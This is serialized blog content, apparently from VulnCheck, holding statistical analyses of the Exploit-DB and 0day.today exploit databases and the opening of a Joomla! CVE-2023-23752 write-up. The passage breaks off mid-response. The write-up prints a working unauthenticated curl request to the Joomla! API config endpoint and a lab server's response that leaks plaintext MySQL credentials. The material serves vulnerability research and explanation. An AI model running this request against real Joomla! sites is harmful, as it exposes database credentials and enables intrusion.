remote-with-credentials, infoleak, denial of service, local, client-side, and, of course, the dreaded “other”.",[1925,103390,103391],{},[18,103392,103393],{},"Exploit-DB Exploit CVE Categorization",[11128,103395],{":labels":103396,":values":103397},"[\"Client-side\",\"Denial-of-service\",\"Infoleak\",\"Initial-access\",\"Local\",\"Other\",\"Remote-with-credentials\"]","[6507,1685,1790,12293,523,235,1256]",[1925,103399,103400],{},[18,103401,103402],{},"0day.today Exploit CVE Categorization",[11128,103404],{":labels":103396,":values":103405},"[2292,283,472,1928,606,165,958]",[18,103407,103408,103409,59],{},"The most popular categorization in Exploit-DB is initial-access. These vulnerabilities allow remote and unauthenticated attackers to gain access to a victim network. They’re the type of vulnerabilities VulnCheck believes are ",[47,103410,103412],{"href":45535,"rel":103411},[51],"most important",[18,103414,103415,103416,103421],{},"The most popular categorization in 0day.today is client-side attacks. Client-side attacks are user-interaction oriented attacks like XSS, CSRF, or document-based attacks. For example, ",[47,103417,103420],{"href":103418,"rel":103419},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-30190",[51],"Follina",", is a document-based attack that we categorize as “client-side”. They can be dangerous (Follina has been used widely), but they typically aren’t as dangerous as an initial-access vulnerability.",[18,103423,103424],{},"VulnCheck’s vulnerability categorization doesn’t necessarily capture the severity of a particular group. Initial-access is obviously bad, but we just discussed the wide range of vulnerabilities that are captured by client-side. Other categories, like remote-with-credentials and infoleak, have similar broad impact ranges. To better understand the overall impact in the databases, we mapped the exploit CVEs to their CVSS severity.",[1925,103426,103427],{},[18,103428,103429],{},"Exploit-DB Exploit CVE CVSS Severity",[11128,103431],{":labels":103432,":values":103433},"[\"Critical\",\"High\",\"Medium\",\"Low\",\"Unassigned\"]","[3641,9927,9973,602,146]",[1925,103435,103436],{},[18,103437,103429],{},[11128,103439],{":labels":103432,":values":103440},"[1599,2830,2133,68,74]",[61,103442,79305],{"id":25141},[18,103444,103445,103446,103451],{},"Of course, a freely available exploit doesn’t mean the vulnerability will be exploited in the wild. To predict which of these exploits might be used in the wild, we turn to the ",[47,103447,103450],{"href":103448,"rel":103449},"https:\u002F\u002Fwww.first.org\u002Fepss\u002F",[51],"Exploit Prediction Scoring System"," (EPSS). As its name suggests, the scoring system attempts to predict which vulnerabilities will be exploited in the wild.",[18,103453,103454,103455,103460],{},"When discussing EPSS, we find it easier to discuss the ",[47,103456,103459],{"href":103457,"rel":103458},"https:\u002F\u002Fwww.first.org\u002Fepss\u002Farticles\u002Fprob_percentile_bins",[51],"percentile rank"," instead of the raw probability. The scaling is easier to understand for our monkey brains. For example, two vulnerabilities are assigned an EPSS probability of 25% and 50%, respectively. Those sound like very different probabilities, but their percentile rank (ranked against all other vulnerabilities) is 95%+. Despite their gap in probability, they are both very bad vulnerabilities with a very high likelihood, compared to all the others, of being exploited in the wild.",[18,103462,103463],{},"We mapped the EPSS percentile rank for both databases, and due to the volume of data points, we had to break out Excel (so please excuse the lack of a fancy graphic).",[1925,103465,103466],{},[18,103467,103468],{},"Exploit-DB Exploit CVE EPSS Percentile",[18,103470,103471],{},[68,103472],{":width":10862,"alt":103473,"src":103474},"Exploit-DB EPSS Percentile Histogram","\u002Fblog\u002Fexploit-database-followup\u002Fedb-epss.png",[1925,103476,103477],{},[18,103478,103479],{},"0day.today Exploit CVE EPSS Percentile",[18,103481,103482],{},[68,103483],{":width":10862,"alt":103473,"src":103484},"\u002Fblog\u002Fexploit-database-followup\u002Fohdaytoday-epss.png",[18,103486,103487],{},"These graphs aren’t quite what we expected. There’s a long-running stigma in our industry that publishing an exploit inevitably leads to exploitation in the wild. That sort of makes logical sense. The presence of a vulnerability in an exploit database means at least two things:",[1789,103489,103490,103493],{},[25,103491,103492],{},"Someone has taken precious time out of their lives to figure out how to exploit a thing.",[25,103494,103495],{},"They shared that exploitation knowledge with the world.",[18,103497,103498],{},"A logical next step, that many have accepted as fact, is: “Bad actors use that freely shared knowledge against the innocent.”",[18,103500,103501],{},"Naively, we’d expect the probability of exploitation for any vulnerability in these databases to be nearly 100%. That isn’t what we are seeing here. While there are a disproportionate amount of 90%+ vulnerabilities, it’s interesting to see data points across the entire range, from 0% to 100%.",[18,103503,103504,103505,103509],{},"The reality is that the vast majority of these vulnerabilities aren’t used in the wild. VulnCheck ",[47,103506,103508],{"href":214,"rel":103507},[51],"tracks"," CVE exploited in the wild, and we found only a few hundred vulnerabilities in each database fit that bill.",[1925,103511,103512],{},[18,103513,103514],{},"CVE Exploited in the Wild (Tracked by VulnCheck)",[11128,103516],{":labels":103517,":values":103518},"[\"Exploit-DB\",\"0day.today\"]","[511,474]",[18,103520,103521],{},"Consider that Exploit-DB contains exploits for nearly 25,000 CVE, but only 500 of those have been exploited in the wild. 500 CVE is only 2% of the CVE in the database. What does that say about the other 98% of vulnerabilities of the database? What does it say about the actual harm associated with publishing an exploit?",[18,103523,103524,103525,103529],{},"Of course, you don’t have to exclusively trust our exploited in the wild data. The ",[47,103526,103528],{"href":2864,"rel":103527},[51],"CISA Known Exploited Vulnerabilities Catalog"," produces similar results.",[1925,103531,103532],{},[18,103533,103534],{},"CVE Exploited in the Wild (Tracked by CISA Kev Catalog)",[11128,103536],{":labels":103517,":values":103537},"[333,349]",[18,103539,103540],{},"With all the time and effort expended discovering these vulnerabilities, developing exploits, sharing the exploits, and curating these databases, it’s wild to think only a tiny percentage ever get used.",[61,103542,1903],{"id":1902},[18,103544,103545,103546,103549],{},"This blog took a deeper look into the types of vulnerabilities in Exploit-DB and 0day.today. The databases contain a wide range of exploits for attackers to enjoy. There are exploits for initial access, pivoting, and escalation. There are exploits for phishing and drive-by attacks. But each database also has a huge amount of low hanging (and possibly useless) exploits too. At the end of the day, only a select few exploits from these databases will ever be ",[295,103547,103548],{},"known"," to be exploited in the wild.",[18,103551,103552],{},"Thank you to those of you who reached out with questions!",[18,103554,103555,103556,103250],{},"Do you like exploits? So do we! VulnCheck maintains the largest collection of exploits. For more information, register for a VulnCheck account today by loading ",[47,103557,78319],{"href":78319,"rel":103558},[51],{"title":219,"searchDepth":220,"depth":220,"links":103560},[103561,103562,103563],{"id":103303,"depth":220,"text":103304},{"id":25141,"depth":220,"text":79305},{"id":1902,"depth":220,"text":1903},"2023-04-07","Following reader suggestions, we take a deeper look at the types of vulnerabilities in the Exploit-DB and 0day.today exploit databases. We also examine exploit attack vectors and find out how many of the exploits have been used in the wild.",{"slug":103567},"exploit-database-followup","\u002Fblog\u002Fexploit-database-followup",{"title":103279,"description":103565},"blog\u002Fexploit-database-followup","lcmUBV5P4jBiWilGhx78tSV1wghVsP5hRZ5ghl5Ipqk",{"id":103573,"title":103293,"articles":103574,"authors":103579,"body":103581,"date":103772,"description":103773,"extension":234,"image":7,"link":7,"meta":103774,"navigation":237,"path":103776,"seo":103777,"series":7,"stem":103778,"subtype":7,"tags":7,"__hash__":103779},"blog\u002Fblog\u002Fedb-0day-compare.md",[103575],{"title":103576,"source":3494,"link":103577,"date":103578},"Microsoft addresses OneNote malspam problem, promises fixes through the year","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-microsoft-addresses","2023-04-03",[103580],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":103582,"toc":103763},[103583,103585,103600,103604,103614,103619,103623,103638,103641,103647,103651,103658,103663,103667,103673,103677,103685,103690,103694,103697,103701,103704,103709,103713,103718,103722,103745,103747,103750,103755,103757,103760],[1920,103584,11648],{"id":11647},[18,103586,103587,103588,103593,103594,103599],{},"Reports of ",[47,103589,103592],{"href":103590,"rel":103591},"https:\u002F\u002Fwww.exploit-db.com\u002F",[51],"Exploit-DB’s"," death were greatly exaggerated. After publishing almost no exploits for four months, Exploit-DB is alive and publishing new exploits with a vengeance. As collectors of exploits, we missed Exploit-DB (EDB) and we’re glad it's back. But while EDB was on hiatus, we found that ",[47,103595,103598],{"href":103596,"rel":103597},"https:\u002F\u002F0day.today\u002F",[51],"0day.today"," was a reliable stand-in. Now with both projects alive and kicking, we wanted to get a better understanding of these exploit databases, and how they differ.",[61,103601,103603],{"id":103602},"number-of-exploits","Number of Exploits",[18,103605,103606,103607,103610,103611,103613],{},"Exploit-DB and 0day.today aren’t just exploit databases. Outside of exploits, they both have growing collections of shellcode, and EDB maintains large repositories of research papers and Google dorks. But the main draw is their exploits. By exploit volume, EDB is king. With more than 45,000 exploits",[47,103608,467],{"href":103609},"#footnotes",", EDB exceeds 0day.today’s offering of just under 38,000",[47,103612,353],{"href":103609},". On both fronts, that’s a lot of exploits. But how relevant are they? Both exploit repositories have timestamps on their exploits, so let’s graph those.",[1925,103615,103616],{},[18,103617,103618],{},"Total Exploits Per Year",[30063,103620],{":labels":103621,":series":103622},"[1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2011,2012,2013,2014,2015,2016,2017,2018,2019,2020,2021,2022,2023]","[{\"type\":\"line\",\"name\":\"Exploit-DB\",\"color\":\"#6667ab\",\"data\":[2,0,2,1,1,1,7,7,35,97,92,374,630,535,790,1281,1406,2249,3474,3000,4044,3591,4757,2248,2175,1430,1199,1342,1535,2191,2266,1861,1399,1143,401,30]},{\"type\":\"line\",\"name\":\"0-day.today\",\"color\":\"#00c893\",\"data\":[0,0,0,0,0,0,0,0,7,14,2,0,54,49,13,135,318,584,1572,1731,2676,2852,4704,2050,2666,1470,1237,1651,1683,2657,2340,1768,1791,1543,943,154]}]",[18,103624,103625,103626,103631,103632,103637],{},"This graph says a few interesting things, but the first thing we’d like to call out is the “date” that is published by EDB. We believe this is generally reliable, but they also have a number of exploits published from ",[47,103627,103630],{"href":103628,"rel":103629},"https:\u002F\u002Fwww.exploit-db.com\u002Fexploits\u002F19039",[51],"1988"," through the 1990s, all of which ",[47,103633,103636],{"href":103634,"rel":103635},"https:\u002F\u002Fwww.exploit-db.com\u002Fhistory",[51],"predate EDB",". There may be a small amount of backdating going on (or something akin) but overall it didn’t appear to be an issue.",[18,103639,103640],{},"The peak of these two projects is wild. In 2010, they both added 4,700+ exploits. That’s almost 13 new exploits every day of the year. They have mightily fallen though. In 2022, 0day.today published 943 exploits, and EDB only managed 401. In fact, we were surprised to find that 0day.today has published more exploits per year than EDB since 2012 (with the exception of 2019). For whatever reason, we thought EDB was the standard and 0day.today the challenger. It might be the other way around.",[18,103642,103643,103644,103646],{},"There is a pretty obvious reason for the drop off in exploits. The rise of bug bounties (and associated platforms) ",[1131,103645,98490],{}," come to mind, but that's only a small drop in the bucket. We've found that the missing exploits are almost entirely found on social coding platforms like GitHub, GitLab, Gitee, Gist, etc. The huge shortfalls affecting these two databases are more or less correlated to the rise in popularity of these services. Social coding platforms were not wildly popular in 2010 (the 0day.today and EDB peak). Nowadays every coder has a GitHub account. Which means they don't need EDB or 0day.today anymore. They can avoid the hassle of submitting their work for third party editing and moderation, and simply upload the exploit\u002Fresearch to their own account.",[61,103648,103650],{"id":103649},"exploits-with-associated-cve","Exploits with Associated CVE",[18,103652,103653,103654,103657],{},"That isn't to say ",[1131,103655,103656],{},"we"," believe third party moderation is a bad thing. We know all too well that curating an exploit database is a real challenge now that exploits are scattered across social coding platforms. But it's a worthwhile endeavour. Both red and blue teams benefit from a curated database that includes CVE to exploit mappings. EDB outperforms 0day.today in this regard. They've been more likely, historically, to tag their exploits with an associated CVE identifier. The following graph shows the total exploits for each CVE year (CVE-YYYY):",[1925,103659,103660],{},[18,103661,103662],{},"Exploits By CVE Year (CVE-YYYY)",[30063,103664],{":labels":103665,":series":103666},"[1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2011,2012,2013,2014,2015,2016,2017,2018,2019,2020,2021,2022,2023]","[{\"type\":\"line\",\"name\":\"Exploit-DB\",\"color\":\"#6667ab\",\"data\":[509,609,548,720,660,1113,1777,3357,3003,4055,2450,1630,762,1114,876,1085,819,635,1299,1225,816,350,275,113,0]},{\"type\":\"line\",\"name\":\"0-day.today\",\"color\":\"#00c893\",\"data\":[7,1,1,2,4,5,3,14,5,7,20,27,21,73,452,652,603,663,1340,1340,796,701,531,353,46]}]",[18,103668,103669,103670,103672],{},"During the massive peak in 2010, 0day.today attached very few CVE to their exploits even though they were publishing at the same rate as EDB. But since 2016, on a yearly basis, 0day.today has published ",[1131,103671,81313],{}," exploits associated with a CVE-ID than EDB. EDB might have 0day.today beat historically, but they trail 0day.today more recently.",[61,103674,103676],{"id":103675},"unique-exploits","Unique Exploits",[18,103678,103679,103680,103684],{},"For the exploits that have associated CVE, we can also determine the uniqueness of each database. For example, do both databases have exploits for ",[47,103681,97160],{"href":103682,"rel":103683},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-1270",[51]," or is that CVE unique to one database? The measurement of uniqueness is interesting, because one database can more or less eliminate the need for the other by dominating on the amount of unique exploits. The following bar graph shows the amount of overlap between the two databases.",[1925,103686,103687],{},[18,103688,103689],{},"Unique CVE",[11128,103691],{":labels":103692,":values":103693},"[\"Only in Exploit-DB\",\"In Both Databases\",\"Only in 0day.today\"]","[19577,4679,1979]",[18,103695,103696],{},"We can see Exploit-DB dominates from this point of view. 0day.today is hurt by its poor history of associating exploits to CVE, and is left with only 1,979 unique CVE in their database compared to EDB’s 19,577. While that would suggest that EDB is the better database, we also know that 0day.today is currently publishing more exploits per year. So it seems we can’t write off either database quite yet.",[61,103698,103700],{"id":103699},"exploit-authors","Exploit Authors",[18,103702,103703],{},"Both databases are largely composed of user submissions. With such large databases, we thought it would be interesting to see who the top 10 exploit authors were. We were somewhat surprised that the top four were identical for both projects. Although, given the amount of overlap between the databases, perhaps it shouldn’t have been a surprise.",[1925,103705,103706],{},[18,103707,103708],{},"Top 10 0day.today Authors",[11128,103710],{":labels":103711,":values":103712},"[\"Metasploit\",\"Google Security Research\",\"Ihsan Sencan\",\"LiquidWorm\",\"indoushka\",\"KedAns-Dz\",\"rgod\",\"High-Tech Bridge\",\"0day Today Team\",\"hyp3rlinx\"]","[1525,1018,901,668,453,265,255,243,234,234]",[1925,103714,103715],{},[18,103716,103717],{},"Top 10 Exploit-DB Authors",[11128,103719],{":labels":103720,":values":103721},"[\"Metasploit\",\"Google Security Research\",\"Ihsan Sencan\",\"LiquidWorm\",\"Luigi Auriemma\",\"High-Tech Bridge SA\",\"anonymous\",\"rgod\",\"Vulnerability-Lab\",\"indoushka\"]","[1928,1176,954,641,417,409,355,333,312,296]",[18,103723,103724,103725,1246,103729,1246,103734,1246,103739,103744],{},"It’s impressive to see the individual researchers that have produced so much content that they made it into these top 10 lists. ",[47,103726,103728],{"href":31494,"rel":103727},[51],"LiquidWorm",[47,103730,103733],{"href":103731,"rel":103732},"https:\u002F\u002Faluigi.altervista.org\u002F",[51],"Luigi Auriemma",[47,103735,103738],{"href":103736,"rel":103737},"http:\u002F\u002Fretrogod.altervista.org\u002F",[51],"rgod",[47,103740,103743],{"href":103741,"rel":103742},"http:\u002F\u002Fhyp3rlinx.altervista.org\u002F",[51],"hyp3rlinx",", etc. are well established in the profession so it isn’t a huge surprise that their exploits ended up in both databases, but the sheer volume is inspiring and says a lot about the impact the individual researcher can still have on the profession..",[61,103746,1903],{"id":1902},[18,103748,103749],{},"EDB and 0day.today both contain tens of thousands of exploits, and although there is a good amount of overlap between the projects, they each offer their own unique exploits. While many modern exploit developers may be moving to other venues (such as GitHub), these databases continue to be updated with new content and they contain historical exploits that have otherwise long fallen off the internet. Hopefully they continue to operate for many years to come.",[18,103751,103555,103752,103250],{},[47,103753,78319],{"href":68261,"rel":103754},[51],[993,103756,36665],{"id":36664},[18,103758,103759],{},"1 Data collected on March 25, 2023. EDB published dozens of exploits after this date, so any 2023-specific statistics might look wrong, but the reality is they were largely silent until late March.",[18,103761,103762],{},"2 You might be thinking, “Hey! The 0day.today website says they have more than 38,000 exploits!” That’s true, but we aren’t 100% sure how they arrived at that number. We believe they only exceed 38,000 if you include shellcode in the count. Which we don’t.",{"title":219,"searchDepth":220,"depth":220,"links":103764},[103765,103766,103767,103768,103769],{"id":103602,"depth":220,"text":103603},{"id":103649,"depth":220,"text":103650},{"id":103675,"depth":220,"text":103676},{"id":103699,"depth":220,"text":103700},{"id":1902,"depth":220,"text":1903,"children":103770},[103771],{"id":36664,"depth":1266,"text":36665},"2023-03-31","Exploit-DB and 0day.today are two of the largest public exploit databases. In this blog, we compare the databases to determine which one is the most relevant today.",{"slug":103775},"edb-0day-compare","\u002Fblog\u002Fedb-0day-compare",{"title":103293,"description":103773},"blog\u002Fedb-0day-compare","rwoMZzsvy9iXh4jxVjauYZFKWj7TeqlfFToel-Ayn6g",{"id":103781,"title":103782,"articles":103783,"authors":103788,"body":103790,"date":106075,"description":106076,"extension":234,"image":7,"link":7,"meta":106077,"navigation":237,"path":106079,"seo":106080,"series":7,"stem":106081,"subtype":7,"tags":106082,"__hash__":106083},"blog\u002Fblog\u002Fjoomla-for-rce.md","Joomla! CVE-2023-23752 to Code Execution",[103784],{"title":103785,"source":3494,"link":103786,"date":103787},"Risky Biz News: Team Synacktiv wins a Tesla and a cool half mil at Pwn2Own 2023","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-team-synacktiv-wins","2023-03-27",[103789],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":103791,"toc":106069},[103792,103811,103829,103833,103852,103863,103868,103872,103875,103880,103884,103887,103900,103904,103907,105082,105092,105102,105108,105117,105126,105594,105597,105618,105624,105634,105637,105641,105644,106040,106053,106055,106063,106066],[18,103793,103794,103795,30297,103799,103804,103805,103810],{},"On February 16, 2023, Joomla! published a ",[47,103796,20035],{"href":103797,"rel":103798},"https:\u002F\u002Fdeveloper.joomla.org\u002Fsecurity-centre\u002F894-20230201-core-improper-access-check-in-webservice-endpoints.html",[51],[47,103800,103803],{"href":103801,"rel":103802},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-23752",[51],"CVE-2023-23752",". The advisory describes an “improper access check” affecting Joomla! 4.0.0 through 4.2.7. The following day, a ",[47,103806,103809],{"href":103807,"rel":103808},"https:\u002F\u002Fxz.aliyun.com\u002Ft\u002F12175",[51],"chinese-language blog shared"," the technical details of the vulnerability. The blog describes an authentication bypass that allows an attacker to leak privileged information.",[18,103812,103813,103814,103819,103820,10515,103824,103828],{},"The blog’s disclosure was followed by a ",[47,103815,103818],{"href":103816,"rel":103817},"https:\u002F\u002Fgithub.com\u002Fsearch?q=CVE-2023-23752&type=repositories",[51],"stream of exploits"," hitting GitHub, and ",[47,103821,29823],{"href":103822,"rel":103823},"https:\u002F\u002Fisc.sans.edu\u002Fdiary\u002Frss\u002F29614",[51],[47,103825,24909],{"href":103826,"rel":103827},"https:\u002F\u002Fviz.greynoise.io\u002Ftag\u002Fjoomla-credential-disclosure-cve-2023-23752-attempt?days=30",[51]," of exploitation in the wild. The public exploits focus on leaking the victim’s MySQL database credentials – an unexciting prospect (we thought), because exposing the database to the internet is a dangerous misconfiguration. Nonetheless, attackers seemed interested in the vulnerability, so we sought to find out why.",[61,103830,103832],{"id":103831},"joomla-versions-in-the-wild","Joomla! Versions in the Wild",[18,103834,103835,103836,10515,103841,103846,103847,103851],{},"The importance of a vulnerability is often linked to the number of affected internet-facing systems. ",[47,103837,103840],{"href":103838,"rel":103839},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=http.component%3A%22Joomla%22",[51],"A",[47,103842,103845],{"href":103843,"rel":103844},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=html%3A%22Joomla%21+-+Open+Source+Content+Management%22",[51],"couple"," Shodan queries find approximately 50,000 internet-facing Joomla! Instances. ",[47,103848,55030],{"href":103849,"rel":103850},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=services.http.response.body%3A%22Joomla%21+-+Open+Source+Content+Management%22",[51],", with virtual hosts included, puts that number closer to 1.3 million installations. We only have access to the Shodan data though, so we continue with that for the remainder of this writeup.",[18,103853,103854,103855,103858,103859,103862],{},"A Joomla! installation’s version can be remotely extracted without authentication by querying one of a few different endpoints. Joomla! version 4 exposes version information in the ",[886,103856,103857],{},"\u002Flanguage\u002Fen-GB\u002Flangmetadata.xml"," endpoint. Additionally, most, if not all, Joomla! Instances expose their version in the ",[886,103860,103861],{},"\u002Fadministrator\u002Fmanifests\u002Ffiles\u002Fjoomla.xml"," endpoint (retrievable without authentication, despite the pathname). We scanned the IP addresses indexed by Shodan and found that Joomla! 4 is not very popular. Only about 14% of responding Joomla! instances used version 4, the only version affected by CVE-2023-23752.",[1925,103864,103865],{},[18,103866,103867],{},"Joomla! Major Versions in the Wild",[11128,103869],{":labels":103870,":values":103871},"[1,2,3,4]","[205,2827,25061,4597]",[18,103873,103874],{},"Fewer than 5000 internet-facing installations is hard to get excited about. But what’s even worse for attackers, is that only ~1500 (or 4% of the responding Joomla! servers) remain vulnerable to the attack.",[1925,103876,103877],{},[18,103878,103879],{},"Joomla! Version 4 Versions in the Wild",[11128,103881],{":labels":103882,":values":103883},"[\"4.3.0\",\"4.2.9\",\"4.2.8\",\"4.2.7\",\"4.2.6\",\"4.2.5\",\"4.2.4\",\"4.2.3\",\"4.2.2\",\"4.2.1\",\"4.2.0\",\"4.1.5\",\"4.1.4\",\"4.1.3\",\"4.1.2\",\"4.1.1\",\"4.1.0\",\"4.0.6\",\"4.0.5\",\"4.0.4\",\"4.0.3\",\"4.0.2\",\"4.0.1\",\"4.0.0\"]","[3,984,876,214,429,198,104,133,101,25,38,794,92,39,116,1,104,73,53,106,82,15,2,15]",[18,103885,103886],{},"Which means, despite continued interest from attackers, this vulnerability has almost run its course just a month after disclosure.",[18,103888,103889,103890,103895,103896,103899],{},"Based on the versions of the internet-facing Joomla!, we believe this vulnerability, while dangerous, was never a huge issue (nothing approaching ",[47,103891,103894],{"href":103892,"rel":103893},"https:\u002F\u002Fwww.rapid7.com\u002Fblog\u002Fpost\u002F2018\u002F04\u002F27\u002Fdrupalgeddon-vulnerability-what-is-it-are-you-impacted\u002F",[51],"Drupelgaddon"," at least). So what about this vulnerability has attackers so excited that they are ",[1131,103897,103898],{},"still"," landing new exploits on GitHub?",[61,103901,103903],{"id":103902},"cve-2023-23752-to-code-execution-1","CVE-2023-23752 to Code Execution #1",[18,103905,103906],{},"As discussed, CVE-2023-23752 is an authentication bypass resulting in an information leak. Most of the public exploits use the bypass to leak the system's configuration, which contains the Joomla! MySQL database credentials in plaintext. The following demonstrates the leak:",[1354,103908,103910],{"className":31740,"code":103909,"language":2186,"meta":219,"style":219},"curl -v http:\u002F\u002F10.9.49.205\u002Fapi\u002Findex.php\u002Fv1\u002Fconfig\u002Fapplication?public=true\n* Trying 10.9.49.205:80...\n* TCP_NODELAY set\n* Connected to 10.9.49.205 (10.9.49.205) port 80 (#0)\n> GET \u002Fapi\u002Findex.php\u002Fv1\u002Fconfig\u002Fapplication?public=true HTTP\u002F1.1\n> Host: 10.9.49.205\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n>\n* Mark bundle as not supporting multiuse\n\u003C HTTP\u002F1.1 200 OK\n\u003C Date: Mon, 20 Mar 2023 15:14:05 GMT\n\u003C Server: Apache\u002F2.4.41 (Ubuntu)\n\u003C x-frame-options: SAMEORIGIN\n\u003C referrer-policy: strict-origin-when-cross-origin\n\u003C cross-origin-opener-policy: same-origin\n\u003C X-Powered-By: JoomlaAPI\u002F1.0\n\u003C Expires: Wed, 17 Aug 2005 00:00:00 GMT\n\u003C Last-Modified: Mon, 20 Mar 2023 15:14:05 GMT\n\u003C Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\n\u003C Pragma: no-cache\n\u003C Content-Length: 1983\n\u003C Content-Type: application\u002Fvnd.api+json; charset=utf-8\n\u003C\n{\"links\":{\"self\":\"http:\\\u002F\\\u002F10.9.49.205\\\u002Fapi\\\u002Findex.php\\\u002Fv1\\\u002Fconfig\\\u002Fapplication?public=true\",\"next\":\"http:\\\u002F\\\u002F10.9.49.205\\\u002Fapi\\\u002Findex.php\\\u002Fv1\\\u002Fconfig\\\u002Fapplication?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20\",\"last\":\"http:\\\u002F\\\u002F10.9.49.205\\\u002Fapi\\\u002Findex.php\\\u002Fv1\\\u002Fconfig\\\u002Fapplication?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20\"},\"data\":[{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"offline\":false,\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"offline_message\":\"This site is down for maintenance.\u003Cbr>Please check back again soon.\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"display_offline_message\":1,\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"offline_image\":\"\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"sitename\":\"vulncheck\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"editor\":\"tinymce\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"captcha\":\"0\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"list_limit\":20,\"i* Connection #0 to host 10.9.49.205 left intact\nd\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"access\":1,\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"debug\":false,\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"debug_lang\":false,\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"debug_lang_const\":true,\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"dbtype\":\"mysqli\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"host\":\"localhost\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"user\":\"root\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"password\":\"labpass1\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"db\":\"joomla_db\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"dbprefix\":\"xj3n0_\",\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"dbencryption\":0,\"id\":224}},{\"type\":\"application\",\"id\":\"224\",\"attributes\":{\"dbsslverifyservercert\":false,\"id\":224}}],\"meta\":{\"total-pages\":4}}\n",[886,103911,103912,103923,103930,103936,103948,103961,103968,103974,103986,103990,103996,104002,104009,104021,104028,104035,104042,104049,104056,104063,104083,104090,104097,104113,104117,104691],{"__ignoreMap":219},[1373,103913,103914,103916,103918,103921],{"class":1375,"line":1376},[1373,103915,1557],{"class":2206},[1373,103917,45584],{"class":2209},[1373,103919,103920],{"class":1391}," http:\u002F\u002F10.9.49.205\u002Fapi\u002Findex.php\u002Fv1\u002Fconfig\u002Fapplication?public=",[1373,103922,45801],{"class":7054},[1373,103924,103925,103927],{"class":1375,"line":220},[1373,103926,35613],{"class":1397},[1373,103928,103929],{"class":4640}," Trying 10.9.49.205:80...\n",[1373,103931,103932,103934],{"class":1375,"line":1266},[1373,103933,35613],{"class":1397},[1373,103935,76077],{"class":4640},[1373,103937,103938,103940,103943,103946],{"class":1375,"line":1852},[1373,103939,35613],{"class":1397},[1373,103941,103942],{"class":4640}," Connected to 10.9.49.205 (",[1373,103944,103945],{"class":2206},"10.9.49.205",[1373,103947,88981],{"class":4640},[1373,103949,103950,103952,103954,103957,103959],{"class":1375,"line":4692},[1373,103951,5384],{"class":1397},[1373,103953,76097],{"class":2206},[1373,103955,103956],{"class":1391}," \u002Fapi\u002Findex.php\u002Fv1\u002Fconfig\u002Fapplication?public=",[1373,103958,10874],{"class":7054},[1373,103960,35589],{"class":1391},[1373,103962,103963,103965],{"class":1375,"line":4724},[1373,103964,5384],{"class":1397},[1373,103966,103967],{"class":4640}," Host: 10.9.49.205\n",[1373,103969,103970,103972],{"class":1375,"line":4756},[1373,103971,5384],{"class":1397},[1373,103973,35603],{"class":4640},[1373,103975,103976,103978,103980,103982,103984],{"class":1375,"line":4768},[1373,103977,5384],{"class":1397},[1373,103979,35610],{"class":4640},[1373,103981,35613],{"class":1397},[1373,103983,2180],{"class":4640},[1373,103985,35618],{"class":1397},[1373,103987,103988],{"class":1375,"line":4792},[1373,103989,6765],{"class":1397},[1373,103991,103992,103994],{"class":1375,"line":4798},[1373,103993,35613],{"class":1397},[1373,103995,76148],{"class":4640},[1373,103997,103998,104000],{"class":1375,"line":4806},[1373,103999,11852],{"class":1397},[1373,104001,89055],{"class":4640},[1373,104003,104004,104006],{"class":1375,"line":4817},[1373,104005,11852],{"class":1397},[1373,104007,104008],{"class":4640}," Date: Mon, 20 Mar 2023 15:14:05 GMT\n",[1373,104010,104011,104013,104016,104019],{"class":1375,"line":4825},[1373,104012,11852],{"class":1397},[1373,104014,104015],{"class":4640}," Server: Apache\u002F2.4.41 (",[1373,104017,104018],{"class":2206},"Ubuntu",[1373,104020,11875],{"class":4640},[1373,104022,104023,104025],{"class":1375,"line":4835},[1373,104024,11852],{"class":1397},[1373,104026,104027],{"class":4640}," x-frame-options: SAMEORIGIN\n",[1373,104029,104030,104032],{"class":1375,"line":4843},[1373,104031,11852],{"class":1397},[1373,104033,104034],{"class":4640}," referrer-policy: strict-origin-when-cross-origin\n",[1373,104036,104037,104039],{"class":1375,"line":4849},[1373,104038,11852],{"class":1397},[1373,104040,104041],{"class":4640}," cross-origin-opener-policy: 